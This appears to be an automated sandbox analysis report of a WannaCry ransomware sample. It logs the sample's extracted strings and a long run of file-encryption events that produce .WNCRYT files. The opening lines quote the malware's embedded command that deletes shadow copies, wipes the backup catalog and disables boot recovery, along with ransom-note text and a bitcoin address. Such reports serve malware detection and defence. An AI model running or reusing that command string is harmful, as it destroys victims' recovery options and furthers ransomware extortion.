              Source: @WanaDecryptor@.exe1.11.drBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: @WanaDecryptor@.exe1.11.drBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile deleted: C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile moved: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.jpgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile moved: C:\Users\user\Desktop\DUUDTUBZFW.pngJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile deleted: C:\Users\user\Desktop\DUUDTUBZFW.pngJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.9983293364Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT entropy: 7.99862862088Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRYT entropy: 7.99022560916Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\f8FI06PDUmw1Zws81nUDYY3bWsY.br[1].js.WNCRYT entropy: 7.99637488126Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\HSDak9V_lmtkNU64sorwQW-6T38.br[1].js.WNCRYT entropy: 7.99987680578Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\Ix6gLNUjdsfo1b44Xv9sX0Ilnxw.br[1].js.WNCRYT entropy: 7.99804588737Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT entropy: 7.99953476104Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\lh0O3d6Fmm9PYPDqG8PqHJ4MS7w.br[1].js.WNCRYT entropy: 7.99765168229Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\lpbsfnKE_8agtRF97FH08WFLR1w.br[1].js.WNCRYT entropy: 7.99941120979Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT entropy: 7.99798424395Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\MR6Zgdyo2coaDBmJxRBOLkPvlpk.br[1].js.WNCRYT entropy: 7.99923040544Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\Ov6JSivEymftttgBEDwd3JIRgz0.br[1].js.WNCRYT entropy: 7.99924475914Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\RfoQ_WQ8YccBpTTC1JFx7r-9GWU.br[1].js.WNCRYT entropy: 7.99903034599Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\UHyc3IjuWFO6s9IoOlmmJWw7Jqs.br[1].js.WNCRYT entropy: 7.99963108594Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\vPBP7RPIJrbNZlhe-HUXYkcDX0A.br[1].js.WNCRYT entropy: 7.99719790776Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\x9TiBFKPhYF4yOf0IfKaPIf64qI.br[1].js.WNCRYT entropy: 7.99845396163Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\xO01H2dEYfjtj69ouv_nR5Al0cU.br[1].js.WNCRYT entropy: 7.99900370304Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\ZNvOyS-r2rT3Al22ByUYXLQ5kPY.br[1].js.WNCRYT entropy: 7.99812024708Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\WwF5sNrjseqq673SafWJ8p6dARY[1].js.WNCRYT entropy: 7.9967761313Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT entropy: 7.99088728114Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT entropy: 7.99819743435Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT entropy: 7.99840971864Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913551623871.txt.WNCRYT entropy: 7.99827699961Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913644287936.txt.WNCRYT entropy: 7.99866182586Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133556788209046880.txt.WNCRYT entropy: 7.99849122671Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133556788503660237.txt.WNCRYT entropy: 7.9984883625Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99975186377Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRYT entropy: 7.99917326831Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRYT entropy: 7.99936547955Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Downloads\Ransomware.WannaCry.zip.WNCRYT entropy: 7.99995016523Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.9919612542Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\s.wnry entropy: 7.998263053Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\t.wnry entropy: 7.99727613788Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99981275091Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99648727058Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT entropy: 7.99093301689Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99300407594Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.WNCRYT entropy: 7.99029303433Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT entropy: 7.9921522433Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT entropy: 7.99471300322Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRYT entropy: 7.99274564856Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99775739374Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRYT entropy: 7.99985345761Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRYT entropy: 7.99981081909Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRYT entropy: 7.99983863305Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT entropy: 7.99989229228Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT entropy: 7.9977352683Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99984585845Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996397914Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99950765031Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT entropy: 7.99990418986Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT entropy: 7.99388027995Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT entropy: 7.99987275815Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT entropy: 7.99994618303Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT entropy: 7.99976009055Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT entropy: 7.99956665427Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT entropy: 7.99962678338Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT entropy: 7.99947497095Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT entropy: 7.99959934714Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT entropy: 7.99986337067Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99296596287Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99307418223Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.9923050146Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99274076183Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT entropy: 7.99042253799Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99959135047Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db.WNCRYT entropy: 7.99847969771Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT entropy: 7.99842769341Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.WNCRYT entropy: 7.99754370481Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99979079866Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99994795114Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991740428Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.9998173688Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99634112935Jump to dropped file
